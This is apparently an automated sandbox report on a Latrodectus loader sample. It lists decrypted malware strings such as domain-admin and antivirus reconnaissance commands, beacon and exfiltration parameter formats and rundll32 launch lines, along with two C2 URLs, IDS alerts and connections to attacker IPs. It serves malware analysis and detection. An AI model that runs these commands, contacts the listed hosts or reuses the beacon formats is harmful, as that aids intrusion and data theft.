            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &ipconfig=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: /c net group "Domain Admins" /domain
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: /c net config workstation
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: /c whoami /groups
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &systeminfo=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &domain_trusts=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &domain_trusts_all=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &net_view_all_domain=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &net_view_all=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &net_group=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &wmic=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &net_config_ws=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &net_wmic_av=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &whoami_group=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: "pid":
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: "%d",
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: "proc":
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: "%s",
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: "subproc": [
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &proclist=[
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: "pid":
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: "%d",
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: "proc":
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: "%s",
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: "subproc": [
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &desklinks=[
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: *.*
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: "%s"
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Update_%x
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Custom_update
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: .dll
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: .exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Error
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: runnung
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: %s/%s
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: front
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: /files/
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Theta
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Cookie:
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: POST
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: GET
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: curl/7.88.1
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: CLEARURL
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: URLS
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: COMMAND
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: ERROR
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Q7OdWkarzqrRLA0CTqAqpAml9eHeQs1xfzbY2FZci6KNYp0yryEZjbrqmR2ozu5A
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: [{"data":"
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: "}]
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &dpost=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: https://rolefenik.com/test/
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: https://ergiholim.com/test/
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: \*.dll
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: AppData
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Desktop
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Startup
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Personal
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Local AppData
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: <html>
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: <!DOCTYPE
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: %s%d.dll
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Content-Length: 0
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Content-Type: application/dns-message
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: Content-Type: application/ocsp-request
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: 12345
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: 12345
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &stiller=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: %s%d.exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: %x%x
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &mac=
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: %02x
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: :%02x
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &computername=%s
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: &domain=%s
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: LogonTrigger
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: \Registry\Machine\
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: TimeTrigger
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: PT0H%02dM
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: PT0S
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: \update_data.dat
            Source: unknownHTTPS traffic detected: 104.21.92.105:443 -> 192.168.2.6:49988 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.15.162:443 -> 192.168.2.6:49989 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.15.162:443 -> 192.168.2.6:50001 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.92.105:443 -> 192.168.2.6:50026 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.92.105:443 -> 192.168.2.6:50077 version: TLS 1.2
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI8F42.tmp, 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp, MSI8F42.tmp, 00000004.00000000.2131539788.0000000000337000.00000002.00000001.01000000.00000003.sdmp, medk.msi, MSI8F42.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr
            Source: Binary string: eplgOutlook.pdb source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: medk.msi, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: medk.msi, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI8F42.tmp, 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp, MSI8F42.tmp, 00000004.00000000.2131539788.0000000000337000.00000002.00000001.01000000.00000003.sdmp, medk.msi, MSI8F42.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr
            Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_0032AF79 FindFirstFileExW,4_2_0032AF79
            Source: C:\Windows\explorer.exeCode function: 8_2_02E0A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,8_2_02E0A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_02E02B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_02E02B28

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50011 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49992 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50023 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49997 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49994 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50016 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50001 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49988 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50026 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50015 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50035 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50065 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50044 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50053 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50054 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50076 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50086 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50062 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50080 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50077 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50059 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50014 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50056 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50022 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50007 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50027 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49996 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49993 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50048 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50091 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49991 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50046 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50028 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49998 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50000 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50058 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49995 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50008 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50037 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50070 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50049 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50085 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50078 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50018 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50005 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50071 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50034 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50021 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50057 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50024 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50003 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50025 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50040 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50038 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50090 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50012 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49989 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50089 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50004 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50084 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50043 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50033 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50094 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50017 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50006 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50030 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50010 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50079 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50042 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50041 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50036 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50047 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50074 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50050 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50072 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50055 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50019 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50064 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50051 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50088 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50092 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50032 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50068 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50069 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50093 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50081 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50067 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50013 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50083 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50045 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50082 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50087 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50039 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50061 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50063 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49990 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50095 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50020 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50066 -> 104.21.92.105:443
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 87.120.37.120 9043Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 45.143.166.230 9043Jump to behavior
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://rolefenik.com/test/
